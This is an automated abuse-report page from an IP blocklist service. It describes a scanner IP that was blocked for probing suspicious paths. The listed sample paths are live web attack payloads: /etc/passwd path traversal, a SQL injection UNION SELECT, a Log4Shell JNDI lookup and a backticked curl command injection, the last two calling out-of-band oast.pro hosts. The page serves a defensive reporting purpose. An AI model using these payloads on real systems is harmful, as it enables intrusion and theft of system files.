abuseip.org
- Reason
- suspicious paths across 1 domains
- Hits (last hour)
- 82
- Unique targets hit
- 4
- Unique paths probed
- 2,293
- Detection count
- 18
- First seen
- 2026-06-28 17:33:22 UTC
- Last seen
- 2026-06-28 17:34:36 UTC
- Block expires
- 2026-06-29 18:18:19 UTC
Sample paths probed
- /monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd
- /developLog/downloadLog.php?name=../../../../etc/passwd
- /manage/fileDownloader?sec=1
- /web/admin/setup
- /setup/index.php
- /%2e%2e/%2e%2e/etc/passwd
- /badging/badge_template_print.php?tpl=aa.xml&idt=1337%20UNION%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,%273Fm6fgpKUCGTUSEUPmfyzyn1k0j%27||%27CVE%27||(7*7*7*7)||SWVersion,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20from%20version
- /processexecution/DownloadExcelFile/Infrastructure_Report_Excel
- /installer/install.php
- /cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo
- /index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1
- /index.php?id=50&file=../../../../../../../../../etc/passwd
- /OS/startup/restore/restoreAdmin.php
- /dr/authentication/oauth2/oauth2login?error=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-783%7D$%7B%3A-761%7D.$%7BhostName%7D.uri.d90lloa69p3s0r546i30ogyt7bn3mumzk.oast.pro%7D
- /theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd
- /misc/%60curl$%7BIFS%7Dd90lloa69p3s0r546i30xe9c8ndg3ywyj.oast.pro%60/..;/index.html
- /setup
- /jackett/UI/Dashboard
- /images//////////////////../../../../../../../../etc/passwd
- /page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd
Sample User-Agents
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36 Offensity/nuclei/20260624.14.26.52-prod
What does this mean?
This address sent traffic that the redirs.com edge classified as automated abuse โ typically WordPress/PHP exploit scanning, credential file probing (.env, .git, .aws/), or mass-domain enumeration. The block is automatic and time-limited (24 hours from last detection).
If you believe this is a false positive, contact [email protected] with the IP and the timestamps above.